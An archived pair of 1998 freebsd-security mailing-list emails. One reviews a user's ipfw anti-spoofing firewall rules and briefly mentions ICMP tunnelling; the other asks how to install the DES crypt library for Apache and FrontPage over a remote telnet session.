From owner-freebsd-security Sat Jul 4 19:22:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA09881 for freebsd-security-outgoing; Sat, 4 Jul 1998 19:22:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (jkb@shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA09871 for ; Sat, 4 Jul 1998 19:22:47 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id TAA22217; Sat, 4 Jul 1998 19:22:48 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Sat, 4 Jul 1998 19:22:47 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Louie cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw with ppp -alias setup In-Reply-To: <199807050208.VAA22240@sunra.csci.unt.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Sat, 4 Jul 1998, Louie wrote:

>On Fri, 3 Jul 1998, Jan B. Koum wrote:
>
>> ># ipfw list
>> >01000 allow ip from any to any via lo0
>> >01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8
>> >01110 deny log ip from 192.168.0.0/16 to any in recv tun0
>>                         ^^^^^^
>>
>> Aren't you using 192.168.1.0/16 as you mentioned above?
>
>Yes, but I'm blocking 192.168.1.0/16 from coming in on the PPP side.
>Spoof prevention.
>

Well.. spoofed packets will try to pretend that they are coming from your computer. So, in reality you don't need rules 1210, 1310 and above 1110, but instead only need 192.168.1.0/24 since that is what one would try to spoof with.
>> >01210 deny log ip from 172.16.0.0/12 to any in recv tun0
>> >01310 deny log ip from 10.0.0.0/8 to any in recv tun0
>> >01410 allow tcp from any to any in recv tun0 established
>
>> AFAICT the rules look ok. Really paranoid people might just take
>> out icmp (think Phrack issue 51 article 6). But yeah, everything looks
>> fine. Add the "deny log" rule before the last one if you want.
>
>I'll have to check that out.

Do that. :) Also do note that this type of data tunneling can be done with protocols other than icmp.

-- Yan

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Sat Jul 4 21:04:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA17217 for freebsd-security-outgoing; Sat, 4 Jul 1998 21:04:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.serve.com (mail.serve.com [207.8.152.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA17212 for ; Sat, 4 Jul 1998 21:04:20 -0700 (PDT) (envelope-from numard@smartmedia.com.ar) Received: from smartmedia.com.ar ([203.111.0.219]) by mail.serve.com (8.8.7/8.8.7) with ESMTP id AAA24725 for ; Sun, 5 Jul 1998 00:03:37 -0400 Message-ID: <359EFB36.A4760DD@smartmedia.com.ar> Date: Sun, 05 Jul 1998 14:04:06 +1000 From: "Numard (Norberto Meijome)" Organization: 0xCode X-Mailer: Mozilla 4.05 [en] (WinNT; I) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: URGENT!!! DES only for Apache, consequences? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

PLEASE, CC DIRECTLY TO ME SINCE I'm NOT IN THIS LIST, THX!

Hi! I have to install the des library to make apache 1.3 + frontpage extensions work. Now, the only way to do this, AFAIK, is to do a /stand/sysinstall??? Isn't that like a whole new install?
Anyway, I'd like to modify only the crypt lib, ONLY for apache and FP, and leave the rest running and humming like it is now. The server is in the USA, but I'm working from a remote location through telnet sessions. Any chance of being locked out?

TIA!

-- 
Norberto Meijome (a) Numard, (a) Beto | ICQ # 15032073

* Contrary to popular belief, Unix is user friendly. It just happens to be very selective about who it decides to make friends with.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message